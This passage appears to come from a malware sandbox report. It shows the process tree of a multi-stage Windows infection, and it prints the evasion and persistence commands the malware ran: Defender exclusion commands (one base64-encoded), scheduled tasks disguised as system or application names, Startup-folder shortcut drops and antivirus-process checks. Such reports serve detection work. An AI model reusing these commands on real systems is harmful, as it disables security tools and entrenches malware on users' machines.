                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
                                                                                                                                                    8⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:5352
                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                  timeout 5
                                                                                                                                                  7⤵
                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                  PID:4060
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp2.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp2.exe"
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:3208
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Adds Run key to start application
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:3432
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4344
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\processclass.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\processclass.exe"
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2044
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\clsid.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\clsid.exe"
                                                                                                                                              5⤵
                                                                                                                                                PID:2448
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
                                                                                                                                                5⤵
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4244
                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:4800
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:5016
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                    PID:3464
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEYAaQBsAGUAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==
                                                                                                                                                      6⤵
                                                                                                                                                        PID:4780
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\Utility2.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\Utility2.exe"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:4180
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:112
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\setup8.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\setup8.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:3696
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\meteran.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\meteran.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:1764
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\o.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\o.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:904
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\crypted25.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\crypted25.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:748
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:3068
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:2464
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Drops startup file
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                          PID:3692
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\channel.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\channel.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2240
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:3876
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
                                                                                                                                                            6⤵
                                                                                                                                                              PID:2748
                                                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                tasklist
                                                                                                                                                                7⤵
                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                PID:2376
                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                findstr /I "wrsa opssvc"
                                                                                                                                                                7⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:4084
                                                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                tasklist
                                                                                                                                                                7⤵
                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:1632
                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                                                                                                7⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:996
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd /c md 724598
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:3524
                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                  findstr /V "WowLiberalCalOfficer" Weight
                                                                                                                                                                  7⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:3248
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y
                                                                                                                                                                  7⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:3452
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\724598\Thermal.pif
                                                                                                                                                                  Thermal.pif y
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:2588
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\724598\RegAsm.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\724598\RegAsm.exe
                                                                                                                                                                    8⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:5964
                                                                                                                                                                • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                  choice /d y /t 5
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:2700
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Writes to the Master Boot Record (MBR)
                                                                                                                                                                PID:1356
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:864
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\c2.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\c2.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:5388
                                                                                                                                                                  • C:\Windows\system32\notepad.exe
                                                                                                                                                                    notepad.exe
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:6168
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\procx64.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\procx64.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:2968
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\x64\pomadachashin.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\x64\pomadachashin.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                        • Checks system information in the registry
                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                        PID:5308
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\gawdth.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\gawdth.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:4312
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:6840
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe
                                                                                                                                                                              clamer.exe -priverdD
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:6868
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe"
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  PID:2184
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                          PID:3496
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:6876
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:5704
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:2480
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:4240
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:4748
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Steam.exe'
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:4596
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Steam.exe'
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:6708
                                                                                                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Steam" /tr "C:\Users\Admin\AppData\Roaming\Steam.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:3324
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:6520
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\CovidPass.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\CovidPass.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:6216
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\Discord2.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\Discord2.exe"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:5860
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:6660
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                          PID:3424
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpFAE2.tmp.bat""
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:2136
                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                          timeout 3
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                          PID:1996
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Discord.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Discord.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:3244
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\c1.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\c1.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:4908
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:1656
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:352
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\PaoNan.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\PaoNan.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:4880
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:440
                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                    PID:3788
                                                                                                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3784
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    PID:908
                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                      PID:2940
                                                                                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                                                                                    C:\Windows\System32\conhost.exe
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:1968
                                                                                                                                                                                    • C:\Windows\System32\dwm.exe
                                                                                                                                                                                      C:\Windows\System32\dwm.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      PID:1508
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      cmd /c schtasks.exe /create /tn "Characteristic" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:3340
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "Characteristic" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                          PID:3352
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & echo URL="C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & exit
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                        PID:2444
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                        PID:3552
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                          PID:2500
                                                                                                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                        C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:1692
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                          PID:5512
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                            PID:6812
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\Admin\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                          PID:2488
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:2560
                                                                                                                                                                                        • C:\Windows\system32\taskeng.exe
